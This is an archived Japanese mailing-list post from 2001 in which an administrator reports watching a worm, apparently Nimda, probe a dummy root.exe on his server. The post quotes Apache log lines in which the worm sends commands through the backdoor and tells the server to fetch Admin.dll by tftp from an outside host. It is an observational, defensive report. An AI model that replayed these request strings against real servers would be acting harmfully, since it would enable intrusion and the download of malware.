[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[connect24h:04684] Re: CodeRed 関係だと思うのですが
- To: connect24h@xxxxxxxxxxxxxxxxxxxx
- Subject: [connect24h:04684] Re: CodeRed 関係だと思うのですが
- From: Hiroshi Chonan <chonan@xxxxxxxxxxxxxxx>
- Date: Wed, 19 Sep 2001 16:14:35 +0900
長南です。
Hiroshi Chonanは
2001年09月19日 12:40:47頃、
「[connect24h:04671] Re: CodeRed 関係だと思うのですが」に書きました。
Hiroshi Chonan曰く>>
>
># apache のエラーログを見ると時系列的にMSNがヤられた時刻と
># エラーログの出現が大体符合します。
Code Red のときよりもかなりの頻度でやってくるので、試しにダミーでroot.exe
(中身はプレーンファイル)を置いて観察してみました。
まずはIISの脆弱性やCode Redのバックドアを探してまわるのですが、利用でき
る穴が(今回は /scripts/root.exe にダミーを置きました)
XXX.XXX.XXX.XXX - - [19/Sep/2001:15:38:07 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 366
という具合に見つかると、それを利用して、tftp で Admin.dll (ウィルス本体) を
XXX.XXX.XXX.XXX - - [19/Sep/2001:15:38:08 +0900] "GET /scripts/root.exe?/c+tftp%20-i%20XXX.XXX.XXX.XXX%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 366
という具合にダウンロードさせるようです。そしてその後に
XXX.XXX.XXX.XXX - - [19/Sep/2001:15:38:08 +0900] "GET /scripts/Admin.dll HTTP/1.0" 404 291
とウィルス本体の実行を試みるようです。
ためしに当該ホストに手動でtftpをかけてみるとAdmin.dllはダウンロード可能で
ウィルスに感染している(VirusScanで検出できました)ファイルがダウンロード
できるようでした。
なお、tftp以外の転送手段があるのかどうかは不明です。
# ダミーファイル置いてもリクエストは減りませんでした。
---
// Internet の花束を | 長南 浩(Hiroshi Chonan) (株)データシステム米沢
// 貴方にあげたい... | E-Mail : chonan@xxxxxxxxxxxxxxx
// | PGP KeyFP : 5B17D588598AFC23 BF4582BFB0D7EDC1
------------------------------------------------------------------------
ニュース速報! はインフォシークで!!
http://www.infoseek.co.jp/Home?pg=Home.html&svx=971122